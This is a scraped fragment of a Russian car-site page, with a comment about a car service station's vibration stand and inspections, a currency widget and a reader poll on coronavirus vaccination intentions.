7. С ремнем навесного угадали старенький, потресканый, но не свистел. 

Комментарий № 81:

Написал: sovetnik
Даже СТО Сибирь-авто на складах УРС вибро стенд имеет, тех. осм. и сраховвку выдаст.
stroimguru.ru
Курс валюты:
99.99 71↓   $     105.7 07↓  

Опрос дня:

Вы будете делать прививку от коронавируса?

Нет   49.38%
   
Да, планирую   8.64%
   
Да, но если заставят (на работе / для путешествий)   4.94%
   
Уже сделал   27.16%
   
Затрудняюсь ответить   9.88%
   
Всего голосов: 81

Все опросы >>

Архив статей: